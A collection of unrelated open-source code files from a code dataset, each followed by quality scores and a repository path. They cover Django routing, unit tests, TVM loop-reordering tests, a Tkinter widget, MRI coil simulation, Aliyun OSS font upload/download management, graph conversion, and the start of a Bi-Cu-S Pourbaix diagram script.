from rest_framework import routers from .api import * from . import api from django.urls import path urlpatterns = [ path('translate/', api.TranslateViewSet.as_view(), name='translate'), path('response/', api.ResponseViewSet.as_view(), name='response'), ]
1.5625
2
src/ipdasite.theme/src/ipdasite/theme/tests/test_viewlets.py
NASA-PDS/planetarydata.org
0
12789904
# encoding: utf-8 # Copyright 2012 California Institute of Technology. ALL RIGHTS # RESERVED. U.S. Government Sponsorship acknowledged. from ipdasite.theme.testing import IPDA_SITE_THEME_INTEGRATION_TESTING from Products.Five.browser import BrowserView as View from zope.component import getMultiAdapter from zope.viewlet.interfaces import IViewlet, IViewletManager import unittest2 as unittest class ViewletTest(unittest.TestCase): layer = IPDA_SITE_THEME_INTEGRATION_TESTING def setUp(self): self.context = self.layer['portal'] self.request = self.layer['app'].REQUEST self.view = View(self.context, self.request) def testViewletInterfaces(self): '''Ensure viewlet classes implement proper interfaces''' from ipdasite.theme.browser.agencies import AgenciesViewlet self.failUnless(IViewlet.implementedBy(AgenciesViewlet)) def test_suite(): return unittest.defaultTestLoader.loadTestsFromName(__name__) if __name__ == '__main__': unittest.main(defaultTest='test_suite')
1.90625
2
test/test_user_reset_password_requests_api.py
Apteco/apteco-api
2
12789905
# coding: utf-8 """ Apteco API An API to allow access to Apteco Marketing Suite resources # noqa: E501 The version of the OpenAPI document: v2 Contact: <EMAIL> Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import unittest import apteco_api from apteco_api.api.user_reset_password_requests_api import UserResetPasswordRequestsApi # noqa: E501 from apteco_api.rest import ApiException class TestUserResetPasswordRequestsApi(unittest.TestCase): """UserResetPasswordRequestsApi unit test stubs""" def setUp(self): self.api = apteco_api.api.user_reset_password_requests_api.UserResetPasswordRequestsApi() # noqa: E501 def tearDown(self): pass def test_user_reset_password_requests_confirm_reset_password_request(self): """Test case for user_reset_password_requests_confirm_reset_password_request Confirms a given reset password request and changes the password # noqa: E501 """ pass def test_user_reset_password_requests_create_reset_password_request(self): """Test case for user_reset_password_requests_create_reset_password_request Creates a new reset password requests, which will check that the provided email address exists and then issue a confirmation notification # noqa: E501 """ pass def test_user_reset_password_requests_get_reset_password_request(self): """Test case for user_reset_password_requests_get_reset_password_request Requires OrbitAdmin: Returns details for a given reset password request # noqa: E501 """ pass def test_user_reset_password_requests_get_reset_password_requests(self): """Test case for user_reset_password_requests_get_reset_password_requests Requires OrbitAdmin: Returns all the current reset password requests in the system. # noqa: E501 """ pass if __name__ == '__main__': unittest.main()
2.34375
2
objects_new/Sources_new.py
diogo1790team/inphinity_DM
1
12789906
<reponame>diogo1790team/inphinity_DM # -*- coding: utf-8 -*- """ Created on Wed Sep 27 15:31:49 2017 @author: <NAME> """ from SQL_obj_new.Source_sql_new import _Source_sql_new class Source(object): """ This class treats the Source object as it exists in the SOURCES table of the database By default, all FKs are in the last positions in the parameter declaration The sources are the people who provided us the data, e.g. Aitana, Grég, Xavier, ... """ def __init__(self, id_source = -1, designation = ""): """ Constructor of the Source object. All the parameters have a default value :param id_source: id of the source - -1 if unknown :param designation: designation of the source :type id_source: int - not required :type designation: text - required """ self.id_source = id_source self.designation = designation def get_all_Sources(self): """ return an array with all the Sources in the database :return: array of sources :rtype: array(Source) """ listOfSources = [] sqlObj = _Source_sql_new() results = sqlObj.select_all_sources_all_attributes() for element in results: listOfSources.append(Source(element[0], element[1])) return listOfSources def __str__(self): """ Override of the str method """ message_str = "ID: {0:d} Name: {1}".format(self.id_source, self.designation) return message_str
2.5625
3
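A short usage sketch for the Source class above; it assumes the _Source_sql_new layer is configured against a reachable database:

# Print every source stored in the SOURCES table
for source in Source().get_all_Sources():
    print(source)  # uses the __str__ override: ID: <id> Name: <designation>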
tests/python/unittest/test_tir_schedule_reorder.py
mozga-intel/tvm
2
12789907
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=missing-function-docstring,missing-module-docstring import sys import pytest import tvm from tvm import tir from tvm.script import ty from tvm.tir.schedule.testing import verify_trace_roundtrip # pylint: disable=no-member,invalid-name,unused-variable @tvm.script.tir def elementwise(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_not_affine(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for i, j, k, l in tir.grid(128, 128, 128, 8): with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) tir.bind(vl, l * 16) B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_dependent_loop(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for i in tir.serial(0, 128): for j, k, l in tir.grid(128, i, 128): with tir.block([128, 128, i, 128], "B") as [vi, vj, vk, vl]: B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_predicate(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for i, j, k, l in tir.grid(128, 128, 128, 128): with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: tir.where(i * 2097152 + j * 16384 + k * 128 + l < 100) B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_non_single_branch(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128)) C = tir.alloc_buffer((128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128)) for i, j in tir.grid(128, 128): for k in tir.serial(0, 128): with tir.block([128, 128, 128], "C") as [vi, vj, vk]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) C[vi, vj, vk] = A[vi, vj, vk] * 2.0 for k in tir.serial(0, 128): with tir.block([128, 128, 128], "B") as [vi, vj, vk]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) B[vi, vj, vk] = C[vi, vj, vk] * 2.0 @tvm.script.tir def elementwise_with_loops_not_same_scope(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128)) for i, j in tir.grid(128, 128): with tir.block([128, 128], "A") as [vi, vj]: tir.bind(vi, i) tir.bind(vj, j) for k in tir.serial(0, 128): with tir.block([128], "B") as [vk]: tir.bind(vk, k) tir.reads([A[vi, vj, vk]]) tir.writes([B[vi, vj, vk]]) B[vi, vj, vk] = A[vi, vj, vk] * 2.0 @tvm.script.tir def elementwise_with_wrong_block_var_type(a: ty.handle, b: 
ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128)) for i, j, k in tir.grid(128, 128, 128): with tir.block([128, 128, tir.scan_axis(0, 128)], "B") as [vi, vj, vk]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) tir.reads([A[vi, vj, vk]]) tir.writes([B[vi, vj, vk]]) B[vi, vj, vk] = A[vi, vj, vk] * 2.0 @tvm.script.tir def elementwise_reordered(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for l, j, k, i in tir.grid(128, 128, 128, 128): with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) tir.bind(vl, l) B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_reordered2(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for k, j, i, l in tir.grid(128, 128, 128, 128): with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) tir.bind(vl, l) B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def elementwise_reordered_with_predicate(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, (128, 128, 128, 128)) B = tir.match_buffer(b, (128, 128, 128, 128)) for l, j, k, i in tir.grid(128, 128, 128, 128): with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]: tir.where(i * 2097152 + j * 16384 + k * 128 + l < 100) tir.bind(vi, i) tir.bind(vj, j) tir.bind(vk, k) tir.bind(vl, l) B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0 @tvm.script.tir def opaque_access(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, [16, 16], "float32") B = tir.match_buffer(b, [16, 16], "float32") with tir.block([16, 16], "A") as [vi, vj]: tir.reads([]) tir.writes([A[0:16, 0:16]]) tir.store(A.data, vi * 16 + vj, 1) with tir.block([16, 16], "B") as [vi, vj]: tir.reads([]) tir.writes([B[0:16, 0:16]]) tir.evaluate(tir.tvm_fill_fragment(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype="handle")) @tvm.script.tir def opaque_access_reorder(a: ty.handle, b: ty.handle) -> None: A = tir.match_buffer(a, [16, 16], "float32") B = tir.match_buffer(b, [16, 16], "float32") for j, i in tir.grid(16, 16): with tir.block([16, 16], "A") as [vi, vj]: tir.bind(vi, i) tir.bind(vj, j) tir.reads([]) tir.writes([A[0:16, 0:16]]) tir.store(A.data, vi * 16 + vj, 1) for j, i in tir.grid(16, 16): with tir.block([16, 16], "B") as [vi, vj]: tir.bind(vi, i) tir.bind(vj, j) tir.reads([]) tir.writes([B[0:16, 0:16]]) tir.evaluate(tir.tvm_fill_fragment(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype="handle")) # pylint: enable=no-member,invalid-name,unused-variable def test_reorder(): sch = tir.Schedule(elementwise, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) sch.reorder(l, i) tvm.ir.assert_structural_equal(elementwise_reordered, sch.mod["main"]) verify_trace_roundtrip(sch=sch, mod=elementwise) def test_reorder2(): sch = tir.Schedule(elementwise, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) sch.reorder(k, i, l) tvm.ir.assert_structural_equal(elementwise_reordered2, sch.mod["main"]) verify_trace_roundtrip(sch=sch, mod=elementwise) def test_reorder_with_opaque_access(): sch = tir.Schedule(opaque_access, debug_mask="all") block_a = sch.get_block("A") i, j = sch.get_loops(block_a) sch.reorder(j, i) block_b = sch.get_block("B") i, j = sch.get_loops(block_b) sch.reorder(j, i) tvm.ir.assert_structural_equal(opaque_access_reorder, 
sch.mod["main"]) verify_trace_roundtrip(sch=sch, mod=opaque_access) def test_reorder_with_predicate(): sch = tir.Schedule(elementwise_predicate, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) sch.reorder(l, i) tvm.ir.assert_structural_equal(elementwise_reordered_with_predicate, sch.mod["main"]) verify_trace_roundtrip(sch=sch, mod=elementwise_predicate) def test_reorder_fail_with_multi_appearance_loops(): sch = tir.Schedule(elementwise, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(k, i, i) def test_reorder_fail_with_non_single_branch_loop(): sch = tir.Schedule(elementwise_non_single_branch, debug_mask="all") block_b = sch.get_block("B") i, j, k = sch.get_loops(block_b) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(k, i) sch = tir.Schedule(elementwise_non_single_branch, debug_mask="all") block_b = sch.get_block("B") block_c = sch.get_block("C") i, j, k1 = sch.get_loops(block_b) _, _, k2 = sch.get_loops(block_c) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(k1, i, k2) def test_reorder_fail_with_loops_not_under_same_scope(): sch = tir.Schedule(elementwise_with_loops_not_same_scope, debug_mask="all") block_b = sch.get_block("B") block_a = sch.get_block("A") i, j = sch.get_loops(block_a) k = sch.get_loops(block_b)[0] with pytest.raises(tvm.tir.ScheduleError): sch.reorder(k, i) def test_reorder_fail_with_wrong_block_var_type(): sch = tir.Schedule(elementwise_with_wrong_block_var_type, debug_mask="all") block_b = sch.get_block("B") i, j, k = sch.get_loops(block_b) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(k, i) def test_reorder_fail_with_dependent_loops(): sch = tir.Schedule(elementwise_dependent_loop, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(l, i) def test_reorder_fail_not_affine_bindings(): sch = tir.Schedule(elementwise_not_affine, debug_mask="all") block_b = sch.get_block("B") i, j, k, l = sch.get_loops(block_b) with pytest.raises(tvm.tir.ScheduleError): sch.reorder(l, i) if __name__ == "__main__": sys.exit(pytest.main([__file__] + sys.argv[1:]))
1.84375
2
Pages/MusicPage/Components/Head.py
Th3Wizard001/Amplify
11
12789908
import tkinter as tk from PIL import ImageTk, Image from Pages.MusicPage.Components.TextFrame import TextFrame class Head(tk.Frame): def __init__(self, master, image, text, data, *args, **kwargs): tk.Frame.__init__(self, master, *args, **kwargs) self['background'] = 'black' self.photo = image self.count = 0 self.image_frame = tk.Frame(self, bg='#000000') self.image_frame.bind('<Configure>', self.frame_size) self.text_frame = TextFrame(self, text, data) self.image_label = tk.Canvas(self.image_frame, bd=0, highlightthickness=0) self.image_label.grid(row=0, column=0, sticky='nsew') self.image_label.bind('<Configure>', self.label_size) self.image_frame.grid_columnconfigure(0, weight=1) self.image_frame.grid_rowconfigure(0, weight=1) self.image_frame.grid(row=0, column=0, sticky='nsew', padx=(30, 0), pady=30) self.text_frame.grid(row=0, column=1, sticky='nsew', padx=(10, 0), pady=(30, 30)) self.grid_rowconfigure(0, weight=1) self.grid_columnconfigure(0, weight=1) self.grid_columnconfigure(1, weight=10000) def frame_size(self, event): pass def label_size(self, event): if self.count == 0: width = int(round(event.width / 1.5)) height = int(round(event.height / 2)) self.photo = self.photo.resize((height, height), Image.LANCZOS) self.photo = ImageTk.PhotoImage(self.photo) self.image_label.config(width=width, height=height) self.image_label.create_image(0, 0, image=self.photo, anchor=tk.NW, tags="IMG") self.image_label.configure(width=height) self.count = 1
2.828125
3
direct/data/sens.py
NKI-AI/direct
57
12789909
# coding=utf-8 # Copyright (c) DIRECT Contributors from typing import List, Optional, Tuple, Union import numpy as np from scipy.stats import multivariate_normal as normal def simulate_sensitivity_maps( shape: Union[List[int], Tuple[int]], num_coils: int, var: float = 1, seed: Optional[int] = None ) -> np.ndarray: r"""Simulates coil sensitivities using a bi-variate or tri-variate Gaussian distribution. Parameters ---------- shape: List[int] or Tuple[int] (nx, ny) or (nx, ny, nz). num_coils: int Number of coils to be simulated. var: float Variance. seed: int or None If not None, a seed will be used to produce an offset for the Gaussian mean :math:`\mu`. Returns ------- sensitivity_map : np.ndarray Simulated coil sensitivity maps of shape (num_coils, \*shape). Notes ----- Sensitivity maps are normalized such that: .. math:: \sum_{k=1}^{n_c} {S^{k}}^{*}S^{k} = I. """ if num_coils == 1: return np.ones(shape)[None] + 0.0j # X, Y are switched in np.meshgrid meshgrid = np.meshgrid(*[np.linspace(-1, 1, n) for n in shape[:2][::-1] + shape[2:]]) indices = np.stack(meshgrid, axis=-1) sensitivity_map = np.zeros((num_coils, *shape)) # Assume iid cov = np.zeros(len(shape)) for ii in range(len(shape)): cov[ii] = var cov = np.diag(cov) if seed: np.random.seed(seed) offset = np.random.uniform(0, 2 * np.pi, 1) for coil_idx in range(num_coils): mu = [ np.cos(coil_idx / num_coils * 2 * np.pi + offset).item(), np.sin(coil_idx / num_coils * 2 * np.pi + offset).item(), ] if len(shape) == 3: mu += [0.0] sensitivity_map[coil_idx] = normal(mu, cov).pdf(indices) sensitivity_map = sensitivity_map + 1.0j * sensitivity_map # make complex # Normalize sensitivity_map_norm = np.sqrt((np.conj(sensitivity_map) * sensitivity_map).sum(0))[None] sensitivity_map = sensitivity_map / sensitivity_map_norm return sensitivity_map
2.828125
3
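A quick check of the normalization property stated in the docstring, i.e. that summing conj(S)*S over coils gives the identity (a sketch, assuming the package is importable as direct.data.sens):

import numpy as np
from direct.data.sens import simulate_sensitivity_maps  # assumed import path

smap = simulate_sensitivity_maps((64, 64), num_coils=4, seed=1)
print(smap.shape)  # (4, 64, 64)
identity = (np.conj(smap) * smap).sum(0)
assert np.allclose(identity, 1.0)  # matches the docstring's normalization claim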
aliOss/bucket_manage.py
sunnywalden/oss_management
0
12789910
<reponame>sunnywalden/oss_management # !/usr/bin/env python # coding=utf-8 # author: <EMAIL> import oss2 import json import base64 import os import sys import time from itertools import islice from utils.get_logger import Log from utils.fonts_scanner import get_fonts_from_local from conf import config from aliOss.oss_manage import OssManager class BucketManager: def __init__(self, internet=True): log = Log() self.logger = log.logger_generate('bucket_manage') self.auth = self.get_auth() # self.region = region self.inter_net = internet # self.buck_name = bucket_name @staticmethod def get_auth(): auth = oss2.Auth(config.ali_accesskeyid, config.ali_accesskeysecret) return auth def create_bucket(self, region, bucket_name): oss_url = OssManager.get_oss_url(region, internal_net=False) bucket = oss2.Bucket(self.auth, oss_url, bucket_name) # Set the bucket ACL to private read/write. bucket.create_bucket(oss2.models.BUCKET_ACL_PRIVATE) def get_font_bucket(self): oss_manager = OssManager() for font_bucket_region in config.ali_fonts_bucket: region = font_bucket_region font_oss_url = oss_manager.get_oss_url(region, internal_net=self.inter_net) bucket_name = config.ali_fonts_bucket[font_bucket_region]['bucket_name'] font_bucket = oss2.Bucket(self.auth, font_oss_url, bucket_name) yield font_bucket def percentage(self, consumed_bytes, total_bytes): """Progress bar callback that computes the percentage completed :param consumed_bytes: amount of data uploaded/downloaded so far :param total_bytes: total amount of data """ if total_bytes: # time.sleep(30) rate = int(100 * (float(consumed_bytes) / float(total_bytes))) if rate != 0 and rate % 25 == 0 or rate % 50 == 0 or rate % 75 == 0 or rate % 100 == 0: print(' {0}% '.format(rate), end=' ') sys.stdout.flush() def upload_fonts(self, file_path): file_name = file_path.split('/')[-1] fonts_buckets = self.get_font_bucket() for fonts_bucket in fonts_buckets: # get bucket region fonts_bucket_info = fonts_bucket.get_bucket_info() region = fonts_bucket_info.location.split('-')[-1] # get font bucket storage dir fonts_dir = config.ali_fonts_bucket[region]['font_dir'] upload_res = oss2.resumable_upload(fonts_bucket, os.path.join(fonts_dir, file_name), file_path, store=oss2.ResumableStore(root='./tmp_files/uploads'), multipart_threshold=100 * 1024, part_size=100 * 1024, progress_callback=self.percentage, num_threads=4) print('', end='\n') # print('Upload response: %s' % upload_res) if upload_res.status == 200 or upload_res.resp.status == "OK": print('Font %s upload to bucket %s succeeded' % (file_name, fonts_bucket.bucket_name)) self.logger.info('Font %s upload to bucket %s succeeded' % (file_name, fonts_bucket.bucket_name)) else: print('Font %s upload to bucket %s failed' % (file_name, fonts_bucket.bucket_name)) self.logger.error('Font %s upload to bucket %s failed' % (file_name, fonts_bucket.bucket_name)) def delete_fonts(self, files_names=None, keyword='', pref=''): fonts_buckets = self.get_font_bucket() for fonts_bucket in fonts_buckets: # get bucket region fonts_bucket_info = fonts_bucket.get_bucket_info() region = fonts_bucket_info.location.split('-')[-1] bucket_name = config.ali_fonts_bucket[region]['bucket_name'] # get font bucket storage dir fonts_dir = config.ali_fonts_bucket[region]['font_dir'] if files_names: fonts_list = list(map(lambda file_name: os.path.join(fonts_dir, file_name), files_names)) else: fonts_dict = self.get_fonts(keyword=keyword, pref=pref) # print(fonts_dict) if fonts_dict: fonts_list = fonts_dict[bucket_name] else: fonts_list = [] print('No fonts matched to be deleted in bucket %s' % bucket_name) self.logger.info('No fonts matched to be deleted in bucket %s' % bucket_name) break if fonts_list: fonts_names = list(map(lambda font_oss_object: font_oss_object.key, fonts_list)) print(fonts_names) print('Fonts %s to be deleted in bucket %s' % (fonts_names, bucket_name)) self.logger.info('Fonts %s to be deleted in bucket %s' % (fonts_names, bucket_name)) delete_res = fonts_bucket.batch_delete_objects(fonts_names) print('Delete response: %s' % delete_res) self.logger.info('Delete response: %s' % delete_res) if delete_res.status == 200 or delete_res.resp.status == "OK": self.logger.info( 'Font %s delete from bucket %s succeeded' % (delete_res.deleted_keys, fonts_bucket.bucket_name)) else: self.logger.error( 'Font %s delete from bucket %s failed' % (delete_res.deleted_keys, fonts_bucket.bucket_name)) else: pass def get_fonts(self, keyword='', pref=''): fonts_dict = {} for fonts_bucket in iter(self.get_font_bucket()): # get bucket region fonts_bucket_info = fonts_bucket.get_bucket_info() region = fonts_bucket_info.location.split('-')[-1] # get font bucket storage dir fonts_dir = config.ali_fonts_bucket[region]['font_dir'] self.logger.info('Fonts storage directory %s' % fonts_dir) fonts_list_object = fonts_bucket.list_objects(prefix=fonts_dir, max_keys=1000) fonts_list = fonts_list_object.object_list fonts_names = list(filter( lambda fonts_name: keyword in fonts_name.key and fonts_name.key.split(fonts_dir)[-1].startswith(pref), fonts_list)) fonts_dict[fonts_bucket.bucket_name] = fonts_names return fonts_dict def print_fonts(self, keyword='', pref=''): fonts_dict = self.get_fonts(keyword=keyword, pref=pref) print(fonts_dict) # for bucket_name, fonts_list in fonts_dict: for bucket_name in fonts_dict: fonts_list = fonts_dict[bucket_name] print('There are %s fonts in total in bucket %s ' % (len(fonts_list), bucket_name)) self.logger.info('Fonts in bucket : %s ' % bucket_name) for font in fonts_list: file_name = font.key if file_name.endswith('tf'): print('%s' % file_name) self.logger.info('%s' % file_name) def download_fonts(self, keyword='', pref=''): for fonts_bucket in iter(self.get_font_bucket()): # get bucket region fonts_bucket_info = fonts_bucket.get_bucket_info() region = fonts_bucket_info.location.split('-')[-1] # get font bucket storage dir fonts_dir = config.ali_fonts_bucket[region]['font_dir'] bucket_name = fonts_bucket.bucket_name # oss2.ObjectIterator is used to iterate over the objects. oss_object_list = oss2.ObjectIterator(fonts_bucket) for font_file in oss_object_list: file_name = font_file.key.split(fonts_dir)[-1] if file_name.endswith('tf') and keyword in file_name and file_name.startswith(pref) and fonts_dir in font_file.key: print('fonts %s matched for download in bucket %s' % (font_file.key, fonts_bucket.bucket_name)) self.logger.info( 'fonts %s matched for download in bucket %s' % (font_file.key, fonts_bucket.bucket_name)) try: oss2.resumable_download(fonts_bucket, font_file.key, '../downloads/' + file_name, part_size=100 * 1024, num_threads=3, progress_callback=self.percentage, store=oss2.ResumableDownloadStore(root='./tmp_files/downloads')) except oss2.exceptions.NotFound as en: self.logger.exception('Font %s not found while downloading fonts' % font_file.key) except Exception as e: self.logger.exception('Exception caught while downloading fonts %s: %s' % (font_file.key, e)) else: # print('fonts %s not matched for download in bucket %s' % (file_name, fonts_bucket.bucket_name)) self.logger.debug('fonts %s not matched for download in bucket %s' % (file_name, fonts_bucket.bucket_name)) def upload_fonts_files(self): get_fonts_files = get_fonts_from_local() for fonts_file in iter(get_fonts_files): print('Fonts to be uploaded to ali oss: %s' % fonts_file) self.logger.info('Fonts to be uploaded to ali oss: %s' % fonts_file) self.upload_fonts(fonts_file) if __name__ == '__main__': bucket_region = 'shanghai' # if you are not in an aliyun env, please set it to False inter_net = False bk_manage = BucketManager(internet=inter_net) # print all fonts in ali oss font_dir bk_manage.print_fonts(keyword='AlibabaSans', pref='AlibabaSans') # # download all fonts to local dir ./downloads/ # bk_manage.download_fonts(keyword='test', pref='test') # bk_manage.download_fonts(keyword='AlibabaSans', pref='AlibabaSans') # upload all fonts in local dir ./fonts/ # bk_manage.upload_fonts_files() # bk_manage.delete_fonts(keyword='test', pref='test')
2
2
cargonet/utils/convert.py
romnnn/rail-stgcnn
2
12789911
import torch from torch_geometric.data import Data from torch_geometric.utils import to_undirected def nx_to_tg(g, node_features=None, edge_features=None, convert_edges=True): node_features = node_features or [] edge_features = edge_features or [] n_nodes = g.number_of_nodes() nodes = torch.zeros(n_nodes, len(node_features), dtype=torch.float) for i, (n, data) in enumerate(g.nodes(data=True)): for j, feature in enumerate(node_features): nodes[i][j] = data[feature] n_edges = g.number_of_edges() edges = torch.zeros(n_edges, 2, dtype=torch.long) edge_attrs = torch.zeros(n_edges, len(edge_features), dtype=torch.long) if convert_edges: for i, edge in enumerate(g.edges): u, v = edge # assumes nodes are labeled with integers 0..n_nodes-1 edges[i][0], edges[i][1] = u, v for j, feature in enumerate(edge_features): edge_attrs[i][j] = g.edges[edge][feature] if n_edges > 0: edges = edges.t() edges = to_undirected(edges) # note: edge_attrs are not duplicated for the reversed edges return Data(x=nodes, edge_attr=edge_attrs, edge_index=edges.contiguous())
2.4375
2
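A small end-to-end sketch for the converter above, assuming networkx and torch_geometric are installed and the graph's nodes are labeled 0..n-1 so the edge indices are valid:

import networkx as nx

g = nx.path_graph(4)  # nodes 0..3 in a chain
for node in g.nodes:
    g.nodes[node]["feat"] = float(node)
for u, v in g.edges:
    g.edges[u, v]["dist"] = 1
data = nx_to_tg(g, node_features=["feat"], edge_features=["dist"])
print(data.x.shape)           # torch.Size([4, 1])
print(data.edge_index.shape)  # torch.Size([2, 6]) after to_undirected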
BiCuOS_standardstate.py
MTD-group/BiMOQ-PourbaixDiagrams
0
12789912
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Jul 23 13:17:41 2018 @author: laurenwalters """ import numpy as np import matplotlib.pyplot as plt import random #For saving/importing data from numpy import asarray from numpy import save from numpy import load #Created by <NAME>, 2018-2020 #Contributions by <NAME> #For reactions in aqueous conditions #find out how much detail you want in your graph #n=input("Enter the mesh grid detail you want, suggested (30-140): ") n=30; #Constants R=8.31447; #J/(mol*K) T=298.15; #K F= 9.648533*10**4; #J/(V*mol) P=1; #bar, 10^5*Pa eta=6 nI=10**-eta; #Activity Concentration #Array showing the composition of Cu:Bi:S composition=np.array([1,1,1]) #pH Range and Constants lowpH = -2; highpH = 16; pHrange = highpH-lowpH; pHcount = pHrange/n; #used to iterate through pH range #Applied Potential Range and Constants Ulow = -1.5; #V Uhigh = 1.5; #V Urange = Uhigh-Ulow; #V Ucount = Urange/n; #used to iterate through U (energy) range ############################################################################### ######################## DFT CALCULATIONS ##################################### ############################################################################### #Electronic Energies in eV/f.u. #PBEsol with SOC Ee_Bi= -5.114928333; Ee_Bi2O3= -31.163316; Ee_Bi2O5= -40.1344765; Ee_Bi2O4=-36.7221975; Ee_Bi4O7=-68.40888; #PBEsol Ee_Cu=-4.3152965; Ee_CuO=-10.7488868; Ee_Cu2O=-14.99698; Ee_CuOH2_s=-25.1916025; #PBEsol Ee_O2=-10.281123 Ee_H2=-6.5141508 Ee_S= -4.391811875; ############################################################################### ########### MULTICOMPONENT SPECIES ############################################ #Calculated with PBEsol Ee_Cu2S=-13.4793116667; Ee_Cu7S4=-49.8241325; Ee_CuS=-9.170266; Ee_CuS2=-13.63935; Ee_Cu2SO4_3=-101.5166; Ee_BiCu=-9.31218; Ee_CuBiO2_2=-42.245475; Ee_BiS2=-14.6172585; Ee_Bi2S3=-24.878388; Ee_Bi2S2O=-27.2327565; Ee_Bi2SO4_3=-109.35902; Ee_Bi14OS24=-247.57619; Ee_Bi2SO2=-29.50652; Ee_BiSCuO=-21.5022935; Ee_Cu3BiS3=-32.4713275; Ee_Cu4Bi4S9=-80.830705; Ee_Cu4BiS2_5=-90.647798; Ee_CuBiS2=-19.041996; ############################################################################### ###### Vibrational Energy ##################################################### ############################################################################### #Vibrational Energies in eV/f.u. #From PBEsol Phonon Calculations Fvib_O2=-0.272; F_rot_trans_O2=0.099; Ftot_O2=Fvib_O2+F_rot_trans_O2; F_H = .202; Fvib_S=-0.0091266451372 Fvib_CuO=0.062498987735 Fvib_Cu2O=0.00507624852 Fvib_Cu=-0.007167374680 Fvib_CuOH2_s=0.66653026525 Fvib_Bi=-0.0761976993239 Fvib_Bi2O3=-0.057653546889 Fvib_Bi2O5=0.14677315404 Fvib_Bi2O4=0.12231438709 Fvib_Bi4O7=0.08741679245 Fvib_Cu2S=-0.0050937891364 Fvib_Cu7S4=-0.178002185722 Fvib_CuS=-0.0119849701814 Fvib_CuS2=-0.0033060080158 Fvib_Cu2SO4_3=1.00135494361 Fvib_BiCu=-0.11006963132 Fvib_CuBiO2_2=0.09853363658 Fvib_BiS2=-0.063943629448 Fvib_Bi2S3=-0.1428187610337 Fvib_Bi2S2O=-0.08193190191 Fvib_Bi2SO4_3=0.81266278392 Fvib_Bi14OS24=0.02990373431 Fvib_Bi2SO2=-0.0265520338422 Fvib_BiSCuO=-0.039894146059 Fvib_Cu3BiS3=-0.1661179102334 Fvib_Cu4Bi4S9=-0.3270592722135 Fvib_Cu4BiS2_5=-0.430548296696 Fvib_CuBiS2=-0.08663072302 ############################################################################### ### Compounds-Calculate the formation energies ############################ ############################################################################### #Free Energies of Formation in eV/f.u.
